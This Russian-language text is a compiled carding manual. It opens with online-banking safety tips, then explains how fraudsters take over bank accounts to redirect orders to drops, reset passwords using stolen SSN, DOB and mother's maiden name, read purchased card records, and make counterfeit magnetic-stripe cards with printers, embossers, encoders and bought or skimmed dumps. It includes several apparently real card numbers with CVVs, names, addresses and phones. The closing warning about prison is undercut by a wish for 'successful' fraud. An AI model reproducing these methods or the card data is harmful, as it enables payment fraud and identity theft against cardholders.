Уверен, тебе уже захотелось открыть свой аккаунт в каком-нибудь онлайн-банке
. Читай дальше, потому что именно об этом я и собираюсь рассказать. Особое внимание мы уделим безопасности, поскольку работать тебе придется с реальными деньгами.К сожалению, полностью обезопаситься невозможно. Все, что сделано одним человеком, другой человек в силах сломать. Правда, в российских банках защита почти всегда на высшем уровне. И пользователю практически не придется заботиться о безопасности своей системы. В некоторых банках существуют как программные, так и аппаратные уровни защиты. Из аппаратных существуют USB-ключи и адаптерные ключи, по внешнему виду и устройству похожие на обычные ключи от домофонов. Но это не всегда хорошо. Как поступить, если на компьютере нет USB-порта? А если ты уезжаешь в отпуск, придется брать адаптер и ключ с собой. Ведь интернет-банкинг и создан для того, чтобы им управлять удаленно. Ключ можно потерять, а за новый придется платить даже больше, чем за первый, так как надо будет еще оплатить деактивацию старого ключа. Ключи, правда, стоят относительно недорого - в пределах 800 рублей. Если ты спросишь, какой из них выбрать, я бы посоветовал именно USB-ключ. Он более надежен. Такой ключ шифрует данные, передаваемые тобой во время работы с банком.
Кстати, если клиент (то есть ты) сочтет, что оборудование, которое он приобрел для доступа к интернет-банкингу, его не устраивает, то, согласно закону о защите прав потребителей, он имеет право вернуть свои деньги, в случае если он пользовался интернет-банкингом не более 30 дней. А в «Альфа Банк Экспресс» программное обеспечение вообще выдается пользователям бесплатно (судя по всему, оно просто входит в стоимость подключения к услуге). Отсюда вывод – русские банки самые банковые банки в мире! У американцев нет таких бонусов. И при этом, у них в большинстве случаев просто ужасная система авторизации. Не веришь? Я готов доказать. Для примера возьмем банк Калифорнии и CityBank. В СитиБанке от тебя требуется пин-код карты. В продаже можно легко найти или вытрейдить у кого-либо карты с пин-кодом. В банке Калифорнии необходим всего лишь номер карты и пароль. А в случае утери пин-кода или ключа, тебе скажут что-нибудь вроде: «Спасение утопающих - дело рук самих утопающих» (сам потерял, сам и разбирайся). А за то, чтобы они взяли на себя обязательство найти кардера, тебе придется отвалить им определенный процент от вклада или просто заплатить кучу денег. Вот такие «американские банки». Пожалуй, это один из тех немногих случаев, когда в России какая-то услуга организована реально лучше зарубежной. Именно РЕАЛЬНО, а не в соответствии с пословицей «что для русского халява – для американца 2 года тюремного заключения»
.Так как же все-таки обезопасить свой вклад? Во-первых, никогда и нигде не называй свой пароль доступа, пин-код. Обращай внимание на протокол передачи данных. Если это http, то стоит задуматься, надо ли? Когда откроется страница-форма для ввода данных кредитной карты, посмотри на строку адреса, вернее – на ее конец. Если там ты видишь «https», то можно эту форму заполнить. Если нет, то уходи с этого сайта. Это относится и к интернет-магазинам. Более 40 процентов кредитных карт добываются кардерами методом замены страницы какого-либо сайта на свою, которая пишет номера и прочую информацию, введенную обладателем карты, в лог. Остальные методы защиты стандартны. Пользоваться антивирусной программой, фаерволом, не открывать вложения из непонятных писем, не сообщать друзьям, а тем более незнакомым людям, информацию о своей кредитной карте/банковском аккаунте.
Обзор онлайн-банка
Самое время рассмотреть реальный пример онлайн-банка. Это будет ТПСБанк (г. Томск).
Вот как истолковывают менеджеры банка понятие «интернет-банк»:
«Интернет-банк - это новая компьютерная система проведения электронных платежей через глобальную сеть Internet, которая позволит вам с максимальной скоростью и надежностью осуществлять платежи в рублях и иностранной валюте из любой точки земного шара через наш банк, а также получать выписки по своим счетам и обмениваться сообщениями с сотрудниками банка, экономя при этом массу времени. Все, что вам необходимо иметь при себе - это дискета с секретным ключом и доступ к интернету. Такая система должна стать основной формой общения клиента с банком в области расчетного обслуживания». Так-так, значит, в этом банке используется система защиты с помощью ключа на дискетке. Ну что ж, хороший вариант. При регистрации (офлайновой, в реальном банке) пользователя подводят к компьютеру, он жмет на кнопку в генераторе, создавая таким образом ключ. Ключ записывается в базу данных напротив логина и пароля. То есть, пользователь сначала логинится, а потом уже использует ключ. Логин и пароль этим ключом не шифруются. Ключ лежит в базе, и вся информация, поступающая от пользователя, сначала поступает на сервер зашифрованной, там берется ключ, соответствующий этому пользователю, и информация декодируется.
Вот что можно делать, используя услугу «Онлайн-банк» компании «ТПСБанк»:
Отправлять в банк все виды финансовых документов, включая платежные поручения, и осуществлять валютные переводы.
Получать из банка выписки по своим счетам за любой период с момента начала работы счета.
Осуществлять контроль над текущим состоянием документов в банке.
Обмениваться сообщениями с сотрудниками банка.
Для регистрации нам необходимо:
Открыть счет в ОАО "Томскпромстройбанк" (если нет счета).
Провести предварительную регистрацию с помощью системы "интернет-банк", сгенерировать и зарегистрировать ключи ЭЦП клиента.
Получить сертификат открытого ключа клиента, распечатать и заверить его круглой печатью и подписями ответственных лиц, образцы которых содержатся в банковской карточке образцов подписей
Загрузить бланк договора на обслуживание в системе "интернет-банк" и заполнить его.
Заключить договор на обслуживание в системе "интернет-банк" и произвести окончательную регистрацию в банке (при наличии распечатанного сертификата).
Примечание: информация о банке взята с его сайта и автором не изменялась.
Хочу представить твоему вниманию еще один банк, под названием «О.В.К. Банк». Он просто поразил меня своим феноменальным легкомыслием. Для авторизации надо знать ТОЛЬКО номер кредитки и expiration date (дата окончания действия кредитной карты). На худой конец - только номер. Пробрутфорсить дату окончания не составит труда. Ведь в этом году максимальный срок действия карты – приблизительно до 2010 года. Таким образом, имея 12 месяцев в каждом году, мы получаем 120 комбинаций. Такое можно подобрать и руками, без помощи специального софта.
Немного о кардинге
Если ты в курсе, что такое кардинг, и интересуешься этим, то тебе должно быть известно, что кардеры очень часто ищут карты с онлайн-доступом и покупают их за бешеные деньги. Могу сказать, что дело того стоит. Кто пробовал заниматься кардингом, наверное, заметил, что часто бывает так: закажешь что-нибудь вещественное, на себя или на дропа по левой креде, а оно не приходит. А дело в том, что, по умолчанию, товар может отправляться только на биллинг-адрес, то есть на адрес владельца карты. Но ведь другие как-то заказывают! А делают они это так: заходят в онлайн-банкинг и изменяют реквизиты владельца счета (соответственно и креды) на реквизиты дропа. Некоторые банки позволяют через онлайн изменить даже ФАМИЛИЮ И ИМЯ владельца. Но это в большинстве случаев не обязательно. И если заказ проверяют в e-shop’e, то звонят в банк-эмитент кредитки, по которой сделан заказ. Им, естественно, говорят, что у хозяина креды адрес и телефон действительно такие, какие ты ввел. Магазин примет это к сведению и может еще раз позвонить, но уже не в банк, а дропу, который подтвердит заказ.
Но если ты не сменил биллинг-адрес кредитки в банке, и, позвонив туда, менеджеры магазина узнают, что это адрес не настоящего владельца креды, то они легко узнают его реальный телефон (который ты не изменил). После чего позвонят ему и спросят, заказывал ли он для Васисуалия Пупкина двухмоторную яхту. Если нет… то ему сообщают реквизиты дропа со всеми вытекающими последствиями.
Как ты заметил, для доступа к банковскому аккаунту обычно нужен номер кредитной карты и пароль, реже имя пользователя и пароль. При регистрации обычно указываются конфиденциальные данные пользователя. К примеру, девичья фамилия матери, номер страхового полиса, дата рождения и.т.д. Но достать кредитки с этой информацией не составляет труда. Как хакеры это делают, я не знаю, возможно, с помощью троянов, или взламывают эти самые онлайн-банки. Но пароль… если у тебя есть кредитка со всей инфой (SSN, MMN, DOB), можно попытать счастье и попробовать восстановить пароль. Некоторые банки предлагают восстановить пароль прямо в онлайне, но в большинстве случаев придется звонить в службу поддержки банка, где надо будет называть всю эту информацию. Если ты все скажешь правильно, тебе поменяют пароль.
Сылки по теме:
www.internetfinance.ru - сайт о финансах, я узнал из него много нового и полезного
www.citybank.com - ситибанк (буржуйский)
www.tpsbank.tomsk.ru - Томский банк ТПСБанк
Если клиент сочтет, что оборудование, которое он приобрел для доступа к интернет-банкингу, его не устраивает, то, согласно закону о защите прав потребителей, он имеет право вернуть свои деньги, в случае если он пользовался интернет-банкингом не более 30 дней.
Что такое СС
СС это Credit card.
VISA
Eurocard/Mastercard
JCB
DinersClub International
DinersClub valid in Russia
American Express
Visa Electron
Eurocard/Mastercard Cirrus/Maestro
VISA
- на карте VISA после даты окончания действия карты изображен значок “V” такой же как первая буква логотипа;
- Начальная цифра Visa – 4
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода
Eurocard/Mastercard
- на карте Eurocard/Mastercard после даты окончания действия карты изображен значок MC
- Начальная цифра Eurocard/Mastercard - 5
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода
JCB
- на карте JCB после даты окончания действия карты изображен значок "J" или “звездочка JCB”
- Начальная цифра JCB - 35
DinersClub
- на карте DinersClub после даты окончания действия карты изображен логотип круг с вертикальной чертой
- Начальные цифры DinersClub - 30, 36, 38, 39
- На поле подписи (обратная сторона) повторен номер карты + 3 цифры секретного кода
- На лицевой стороне справа две буквы секретного кода
American Express
- Начальная цифра AmericanExpress - 37
- существуют карты Centurion, Corporate, Optima и Hertz
Необходимые Вам данные для кардинга:
CC number
CVC
EXP
First name
Last name
Street, house number
Sity
Country
State
Zip
Phone number
Credit card - это кредитная карта, у нас же имеется необходимая инфа с неё, она же называется сс, картон, картошка, карты и т.д
Давайте разберемся как примерно выглядят сс инфо трёх самых необходимых и популярных стран. (USA/UK/DE)
Мы не разбираем full info, т.е. ничего дополнительного, только основное.
USA (United States):
5256502253097617 - Сам номер сс (credit card num)
0910 - exp (срок действия карты) 09 месяц 10 год
502 - cvv (секретный код)
Jorge Bailon - имя хранителя карты (cardholder name)
15760 SW 69 ld - улица (street)
miami - город (city)
FL - штат (state)
33193 - зип код (zip code)
US - страна (coutry)
3055051991 - номер телефона (phone num)
VISA - тип карты (type)
К USA сс еще можно добавить SSN, DL, MMN, DOB, credit report и т.д. и т.п.
UK (United Kingdom):
5178057252945584 - cc num
1211 - exp
849 - cvv
Feiyue Ma - cardholder name
8 Wilberforce Road - street
Norwich - city
NFK - это королевство, штат, графство и т.д (county)
GB - country
NR5 8ND - zip code
07883894260 - phone num
Master Card - type
В ЮК как правило берут только DOB как дополнительное инфо. Еще иногда sort code (код сортировки сс), эта инфа нужна
для обхода вбв (verified by visa).
DE (Deutschland):
4344990165183012 - cc num
1112 - exp
830 - cvv
Visa - type
Alexander Reitzenstein - cardholder name
Wichertstrase 38a - street
Berlin - city
10439 - zip-code
030/20055321 - phone num
Deutschland - coutry
В Германии как правило при вбв спрашивает DOB, штатов нету.
Первое, что начинающий кардер должен изучить, так это конечно же информацию о кредитных картах, проще говоря картон / СС.
Итак, приступим.
Первым делом нам нужно найти картон. Самый простой вариант это купить его у продавца. При покупки вы получите картон примерно в таком формате:
4306651004564350 | 10/10 | 826 | Richard Lang | 56 Groveview Cir | Rochester | 14612| NY | USA | 661-298-0881
(Формат у каждого продавца бывает разным)
• 4306651004564350 - Номер кредитной карты.
• 10/10 ( 10 месяц / 10 год,) - Дата окончания действия карты.
• 826 - Защитный код карты CVV/CVV2
• Richard Lang – First и Last Name (??мя, Фамилия)
• 56 Groveview Cir – Адрес
• Rochester – Город
• 14612 – Zip code (зип)
• NY (New York) – Штат
• USA – Страна
• 661-298-0881 - Телефон
За дополнительные $ вы можете пробить дополнительную информацию:
Данные пункты пробиваются в основном для создания Enroll'a, поэтому если вас интересует просто вбив, то они вам скорее всего не понадобятся.
• DOB - дата рождения
• SSN - номер социального страхования
• MMN - Mothers Middle Name (отчество матери, так сказать)
Теперь немного конкретизации, касательно каждого вида карты:
Visa
• Номера кредиток Visa начинаются с цифры 4
• Имеется защита под названием Verified by Visa (VBV)
• 3х значный CVV код
Verified by Visa - уникальная услуга, в которой личный пароль или идентификационная информация используются для защиты номеров карт Visa от несанкционированного использования. Проще говоря у холдера есть код который он должен будет ввести при покупки чего либо.
MasterCard
• Номера кредиток MasterCard начинаются с цифры 5
• Имеется защита под названием MasterCard SecureCode (MCSC)
• 3х значный CVV код
MasterCard SecureCode - принцип работы тот же, что и у VBV.
American Express
• Номера кредиток American Express начинаются с цифры 3
• 4х значный CVV код
Discover
• Номера кредиток Discover начинаются с цифры 6
• 3х значный CVV код
Как определить Zip / Штат / Телефон
1) Заходим на сайт zipcodes.addresses.com/zip_code_lookup.php
(Например, у нас есть город и зип, как определить штат?|Summerville|30747|United States
2) Вбивем город в поле City и выбираем первый попавшийся штат. (допустим это будет GA)
3) Далее нам выводится результат, где мы сверяем Zip тот что указан в картоне и где указано поле ZIP COD на сайте.
4) Как мы видим Зипы совпали а значит наш штат это GA
5) Так же в поле AREA CODE указаны первые три цифры телефона штата
Bin - первые 6-ть цифр в номере кредитной карты, индификатор банка который выдал карту.
Например карта 4306651004564350, где 430665 - номер банка который выдал карту:
Wescom C.U. DEBIT CLASSIC USA Pasadena California CA
сайтик для пробива:
Вот тут ещё на крайняк:
4128004082601569 - Это НОМЕР самой карты!
После этого видно что написано VISA (выбираем VISA)
09|2014 - Это месяц и год окончания карты в основном он пишется так 0914 !
|Catherine|Chandler| - Это имя и фамилия кардхолдера (владельца карты) !
|952| - Это код карты CVV
|308 Swagg Cove Rd.| - Это адрес
|Wedowee| - Это город
|AL| - Это штат
|36278| - индекс или post code
|USA| - естественно страна карты
Остальное не пригадится, но для пояснения:
|7702965721| - номер телефона владельца(вбивайте скайп угорайте над ними)
|[email protected]| - Это e-mail владельца карты (кардхолдер)
COUNTRY - Это страна
FIRST NAME - Имя
LAST NAME - Фамилия
STREET ADDRESS - Адрес
CITY - Город
STATE / PROVINCE - Область или штат в зависимости где проживаете!
ZIP CODE - Индекс
PHONE - Номер телефона , ну тут бред пишите )
EMAIL - Ваш e-mail
Теперь ещё по поводу карт:
На 3 начинается - AMEX (American Express)
На 4 начинается - VISA
На 5 начинается - MasterCard
На 6 начинается - Discover
Шифрование Jabber, ICQ и прочих програм
Если вас заботит проблема перехвата сообщений злобным админом и другими спецслужбами то выход Simp Lite-ICQ-AIM, который поддерживает MSN Messenger, Yahoo! Messenger, ICQ/AOL Instant Messenger (AIM), Jabber/Google Talk.
Поддерживается шифрование сообщений в сетях MSN Messenger, AIM, ICQ, Yahoo! и зашифрованная передача файлов в MSN Messenger и ICQ.
Для шифрования самих сообщений и файлов используются симметричные шифры AES, 3DES, CAST и Twofish c длиной ключа 128 бит.
Для безопасной передачи симметричного ключа шифруемой сессии и аутентификации собеседников используются ассимметричные шифры RSA 2048-4096 bit, ElGamal/DSA 1024/2048 bit, Elliptic curve over GF(p) 256/521 bit.
Программа работает с IM-клиентами в двух режимах:
1) Эмуляции IM-cервера - клиент отправляет сообщения на локальный сервер, там они шифруются и отправляются на настоящий сервер IM-cети. Если у Вас супер-пупер нестандартный клиент, то его возможности могут быть ограничены возможностями локального сервера. 2) Эмуляции прокси SOCKS4 - рекомендуемый режим. Клиент настраивается для работы через локальный SOCKS4 прокси на котором все и будет шифроваться.
Стандартные клиенты программа сама может настроить для работы через себя, а в альтернативных клиентах сервер надо будет прописать руками.
Сама программа так же поддерживает работу через SOCKS4/5/HTTP прокси, так что прямое подключение к интернету для нее не обязательно.
Естественно для того, чтобы шифрование работало необходимо, чтобы у всех участников беседы IM-клиенты работали через эту программу. Для нетребовательных домашних пользователей есть бесплатные Lite версии для каждого протокола. Для корпоративных пользователей и домашних с амбициями - версия Pro.
Настройка программы icq
1. сгенерируйте по 1 ключу каждого вида(длины)
2. пропишите в асе сокс 4 или 5 с IP 127.0.0.1 и портом 15190
3. запустите асю, если она загрузилась значит работает
Настройка программы jabber
1. сгенерируйте по 1 ключу каждого вида(длины)
2. пропишите в jabber сокс 4 или 5 с IP 127.0.0.1 и портом 15222
3. запустите жабу, если она загрузилась значит работает
скачать Simp Lite-ICQ-AIM
скачать SimpLite-Jabber
Также для пользователей QIP имеется специальный плагин Xcrypt
Возможности:
- обмен ключами на основе ассимметричного алгоритма RSA с регулируемой длиной ключа
- шифрование симметричными алгоритмами в связке AES-Twofish-Serpent
- автоматическая расшифровка входящих сообщений, если зашифрованы и пароль сходится (поддержка оффлайн сообщений)
- генерация собственного формата хеша из пароля пользователя
- экспериментальным путем установлено, что отправить можно сообщение длиной примерно 1200 символов максимум, т.к. объем пересылаемого текста увеличивается в 2-3 раза
- возможность устанавливать различные пароли разным контактам
- не требуется никаких дополнительных программ
- простое и удобное включение/выключение шифрования
Как пользоваться:
- скачиваете Xcrypt
- устанавливаете (копируете в папку plugins rypt)
- запускаете qip, пользуетесь
Включение/выключение шифрования, а также установка пароля осуществляется кнопками под аватаром собеседника в окне чата.
Secure IM - плагин для для шифрование переписки Miranda
Плагин обладает ресурсными возможностями шифровать Ваши сообщения на AES192 или PGP/GPG.
Поддержите Unicode, tabSRMM и Clist
Для работы плагина требуется служба Crypto++
скачать сервис Crypto
скачать плагин SecureIM
RatCrypt - плагин для шифрование переписки RnQ
Шифрование переписки между 2-мя RnQ с установленными плагинами
- Алгоритн шифрования - AES 256bit
- Шифруется с помощью пароля или файла с ключом
скачать плагин RatCrypt
SecuredRQ - Плагин шифрования для &RQ
Описание:
Плагин предназначен для шифрования передаваемых сообщений по протоколу Oscar. Исходящие сообщения шифруются посредством алгоритма RSA, 128-битным ключем. Кодирование/декодирование производится при помощи публичных/приватных ключей.
Возможности:
— Шифрование сообщений 128-битным ключем посредством алгоритма RSA.
— Настройка шаблона шифрованых сообщений
— Всплывающие окна в области SysTray
— Смайл, отмечающий зашифрованные сообщения
Требования:
&RQ by Shyr не ниже версии 0.9.7.2.
Также проверена работа плагина на R&Q 1014 by Rapid.
Примечания:
Для работы SecuredRQ необходимо наличие плагина на обеих сторонах.
Плагин НЕ СОВМЕСТИМ с SecureIM.
скачать плагин SecuredRQ
OTR - плагин для шифрование переписки Pidgin
Off-The-Record (OTR) сообщениями позволяет проводить частные разговоры по мгновенными сообщениями, обеспечивая:
- шифрование (никто не сможет прочесть сообщения),
- аутентификацию (возможность удостовериться, что собеседник – тот, за кого он себя выдает),
- анонимность (после того, как разговор окончен, полученные сообщения нельзя однозначно связать с личностями собеседников),
- сохранность прежних сообщений (если ваш закрытый ключ оказался в чужих руках, можно не беспокоиться за сохранность сообщений).
Установив Pidgin, вы сохраняете и список контактов (если он у вас уже есть), и способность связываться с другими пользователями; важно лишь, чтобы все вы обменивались информацией по одному протоколу (например, ICQ).
Сначала нужно установить Pidgin, затем http://andrq.org/forum/viewtopic.php?t=1887 ОТР
Шифрование сообщений в Pidgin | Популярный Linux
Статья для Параноиков))) всем спасибо!
P.S. Любой софт который не получается скачать... можно нагуглить и скачать!
Чем живут реальные кардеры?
Оружие, выстрелы, кровь - все это еще в недалеком прошлом являлось непременным атрибутом ограблений банков и инкассаторов. С появлением кредитных карт и развитием кардинга все изменилось. Теперь не нужно врываться в банк с автоматом в руках и требовать наличные. Достаточно получить доступ к банковскому аккаунту кардхолдера и вывести его деньги со счета. Сделать это можно несколькими способами, одним из которых являются поддельные кредитки, или «белый пластик».
Стандартизация пластиковых карт
Начинать работать, не имея понятия о том, что собой представляют пластиковые карты, невозможно. Поэтому - обо всем по порядку. Ты, наверное, знаешь, что карточки бывают разные (с магнитной полосой, чиповые, БСК, и т.д.). В общем виде их можно классифицировать по методам записи и обработки данных:
- карты с магнитной полосой (магнитные карты);
- карты со встроенной микросхемой (контактные и бесконтактные чиповые карты);
- карты со штриховым кодом (штрихкодовые карты);
- эмбоссированные/печатные карты (с нанесенной информацией методом тиснения или термопечати).
Реального кардера обычно интересуют магнитные и чиповые карты, так как именно они используются платежными системами. Размер карточек носит название ID-1 и составляет 85,6х53,98х0,76 мм. Лицевая сторона карты - аверс, на ней могут располагаться чип, информация о банке-эмитенте, номер карты и логотип платежной системы. На обратной стороне – реверсе - обычно находится магнитная полоса и полоса для подписи. Зоны тиснения информации также закреплены стандартами. Например, строка с идентификационным номером располагается на уровне 20 мм от нижнего края карты и не может превышать 19 символов. Под ней находится зона для нанесения данных кардхолдера (владельца карточки) и Expire Date (срока окончания действия карты). Кроме тиснения, применяется термопечать - печать на карте методом термодиффузии (при нанесении логотипов). Информацию, зафиксированную таким образом, практически невозможно стереть.
Коротко о чиповых картах
Было бы несправедливо не упомянуть в статье о чиповых картах, так как они широко используются российскими банками. Такие карты делятся на 2 типа:
контактные чиповые карты;
Бесконтактные чиповые карты
Контактные карты содержат на аверсе (лицевой стороне) «карман» для расположения чипа. На сам чип-модуль наносится специальный клей, после чего микросхема вклеивается в «карман». Чип представляет собой микрокомпьютер, который обрабатывает поступающие команды (поэтому такие карты и называют смарт-картами). В нем реализована защищенная область памяти, информация в которой кодируется секретными ключами. Технология производства чипов постоянно совершенствуется. Что касается БСК (бесконтактных чиповых карт), то внутри по их периметру расположена антенна, которая позволяет картам обмениваться данными с картридером при помощи радиочастот. Сразу скажу, что в статье я не буду описывать способы подделки чиповых карт, так как основная мишень реал-кардинга - магнитные карты.
Тайна магнитной полосы
Надо отметить, что 90% международных платежных систем используют карты с магнитной полосой. На них я и остановлюсь подробнее. Магнитная полоса располагается на расстоянии 5,5 мм от верхнего края обратной стороны карты и может содержать 2-3 дорожки. Ширина полосы зависит от числа дорожек и составляет 6,4 мм при двух дорожках и 10,3 мм при трех. Как ты понял, вся информация, необходимая для совершения финансовых операций, находится на магнитной полосе.
Теперь рассмотрим каждую из трех дорожек. Первая дорожка включает буквенно-цифровую информацию. На ней помещается до 79 символов. Дорожка содержит следующие данные:
- идентификационный номер - до 19 цифр;
- код страны - 3 цифры;
- ФИО кардхолдера (владельца карты) - от двух до 26 знаков;
- Expire Date (дата истечения срока действия карты) - 4 цифры;
- служебный код - 3 цифры;
- информация эмитента - оставшиеся цифры.
На второй дорожке располагается только цифровая информация, кодируемая двоично-десятичным кодом. Всего на дорожке может быть до 39 символов. Вторая дорожка дублирует информацию первой, за исключением данных о кардхолдере.
Третья дорожка является необязательной. Она содержит цифровую информацию и кодируется аналогично первой дорожке. Максимальное число символов на дорожке - 107.
Ты спросишь: «Зачем нам все это нужно?» Ответ прост: реальный кардер может самостоятельно записывать данные на дорожки магнитной карты. Но об этом далее.
Кардинг, или делаем деньги
Как говорится, перейдем от теории к практике . Все действия реального кардера можно распределить в соответствии со следующим планом:
- подделка пластиковой карты (нанесение тиснения, логотипов платежных систем - одним словом, придание куску пластика товарного вида =));
- запись данных на магнитную полосу;
- обналичивание/шопинг (то, для чего необходимы вышестоящие действия).
Начну с первого пункта. Здесь кардеру необходимо определиться с расходными материалами. Если он собирается налить деньги через банкоматы, то ему достаточно белого пластика с магнитной полоской, а если планирует заняться шопингом, то ему уже потребуется качественно сделанная кредитка с элементами термопечати и тиснения. Второй вариант я рассмотрю подробнее, так как, хотя он и связан с трудоемкий процессом изготовления, но на выходе предполагает полноценный, готовый к употреблению продукт =). Сразу скажу, что для открытия собственной «лаборатории» по производству картона (кредитных карт) преступнику нужны будут определенные денежные вложения, которые, впрочем, окупятся при умелом подходе.
Первая жизненно необходимая вещь - это пластик с впаянной магнитной полосой. Приобрести его сейчас не проблема. Наиболее распространенный тип пластика - CR-80.
Также для грязных дел необходим качественный принтер, с помощью которого на пластик будут наноситься печатный текст и эмблемы. Выбору принтера реальный кардер уделяет особое внимание, так как от него напрямую зависит внешний вид картонки. В качестве примера назову Eltron P210i, который используется для печати удостоверений, пропусков и т.д. Он подходит для односторонней печати без полей и почти идеально штампует карты с разрешением 300 dpi. Также Eltron P210i позволяет наносить штрихкоды, фотографии, графику и текст. Правда стоит он около $2000, но это не помеха, так как все затраты начинающего кардера, как было сказано выше, окупаемы.
Следующий шаг – «выдавливание» на карте инициалов кардхолдеров, банка-эмитента, номера карты и т.д. Для этого существует эмбоссер. Один из вариантов - Matica Z1, имеющий компактный размер и способный выпускать до 600 карт в сутки. Стоимость этого агрегата составляет порядка $3500. Для того чтобы окрасить эмбоссированные символы на карте, нужен типпер. Наиболее характерный выбор - Matica Z Tipper, который всего за несколько секунд придаст картонке подобающий вид. Цена подобного типпера колеблется в пределах $1600. Кроме эмбоссирования, типпинга и печати, на карту требуется нанести голограмму и полосу для подписи. Последняя, сделанная из особой бумаги, клеится на обратной стороне креды. На ней обязательно ставится подпись (по идее, владельца креды =)), без которой карта считается недействительной. Что касается голограммы, то тут дело обстоит несколько сложнее. Оригинальную голограмму практически невозможно содрать с поверхности кредитки. С большинства же поддельных картонок отклеить голограмму не составляет труда, поэтому кардеры уделяют пристальное внимание этой проблеме.
Так, о работе с пластиком я рассказал. Но от просто красиво окрашенных карт толку мало, поэтому перейдем ко второму этапу - записи данных на магнитную полосу. Для этого кардер приобретает энкодер - устройство для чтения и записи магнитной полосы карт. Энкодеры могут записывать 2 вида карт - high и low coercivity (высокой и низкой намагниченности). Лучше тот, который «понимает» любые карты.
Энкодеры также делятся на 2 типа в зависимости от количества записываемых дорожек (треков). Не старайся выбрать именно тот энкодер, который записывает все 3 дорожки, так как третий трек не используется ни POS-терминалами (за исключением редких случаев), ни банкоматами. Основную роль здесь играет вторая дорожка. С ее помощью можно вручную создать первый трек на основе данных, имеющихся во втором. Обычно используются именно эти две дорожки (первая и вторая). Третий трек, как правило, располагает на себе какую-либо дополнительную информацию, не имеющую принципиального значения (система скидок, бонусные очки владельца креды и т.д.).
Из популярных энкодеров могу отметить AMC C722 и MSR206. AMC C722 записывает и читает первые две дорожки; он прекрасно показал себя в «боевых» условиях. По цене он обойдется тебе в $800. После выбора и покупки энкодера преступнику необходимо раздобыть дампы, которые записываются на магнитные полосы картонок. Здесь есть 2 варианта:
кардер покупает дампы у селлеров (людей, торгующих дампами кред);
кардер самостоятельно добывает дампы.
С первым вариантом, думаю, ясно. Берется некая сумма вмз/еголд/etc, ищется человек/сервис по продаже дампов, и происходит закупка. А вот со вторым способом все намного интереснее. Здесь необходимо проявить смекалку и каким-то образом считать скимером (устройством для чтения данных с магнитной полосы) кредитку кардхолдера. Известны случаи сговора с официантами в кафе/ресторане (гостиничными менеджерами), которые за определенную плату считывали скимером дампы с кредитных карт посетителей и передавали их киберпреступнику. Но обычно кардеры закупаются у селлеров и не парятся по этому вопросу. Получив дампы, они подрубают к компу энкодер, ставят нужный софт (который иногда идет в комплекте с энкодером) и закатывают очередную картонку.
Собираем урожай
После всех описанных выше действий преступники приступают к третьему, самому ответственному пункту плана - обналичиванию или шопингу. Здесь есть свои нюансы. Если известен пин-код, то наиболее удобным способом является поход к банкомату. Но если человек закатывал на креду дамп, а пина (PIN) от карточки нет, то ситуация усложняется. Вариант с обналом в банкомате отпадает сразу, так как там ввод пин-кода является обязательным условием. Остается шопинг. Причем кардер ищет только те магазины, в которых установлены POS-терминалы, не требующие пина. Отличить их можно по отсутствию клавиатуры для набора пин-кода. Но, как показывает практика, в российских магазинах они встречаются нечасто. Правда до сих пор работает система с выездом за границу для последующего отоваривания в буржуйских шопах. Но для ее реализации нужны документы, билеты и отработанные схемы. Вообще говоря, такой шопинг является экстремальным в прямом смысле этого слова. Ведь неизвестно, что может ожидать человека в случае неудачной транзакции: удивление кассира, вызов милиции или полиции (за рубежом), звонок в банк и т.д. Как ни крути, но все варианты просчитать невозможно.
Сижу за решеткой в темнице сырой...
Как ты понял из моей статьи, кардинг связан не только материальными вложениями, но и с колоссальным риском. В последнее время участились случаи успешного задержания кардеров сотрудниками МВД и ФСБ. Некоторые известные кардеры добровольно завершили свою деятельность. А тебе я советую и не начинать. Кардинг - это кривая дорога, и шансов, что она приведет тебя к чему-то хорошему в жизни, очень мало. Чтобы не быть голословным, напомню о статье 187 УК РФ «Изготовление или сбыт поддельных кредитных, либо расчетных карт и иных платежных документов». По этой статье реально получить от двух до шести лет (или от четырех до семи, при наличии организованной группы). Подумай на досуге, что тебе дороже: красивая, но короткая жизнь на воле или свобода. Я думаю, выбор очевиден - свобода дороже.
P.S. Спасибо что осилили и прочитали эту методичку-руководство по каржу. Пособие старенькое, но я его немного отредактировал. Надеюсь новичкам будет интересно и полезно почитать.
Желаю вам удачных и успешных вбивов каждый день!
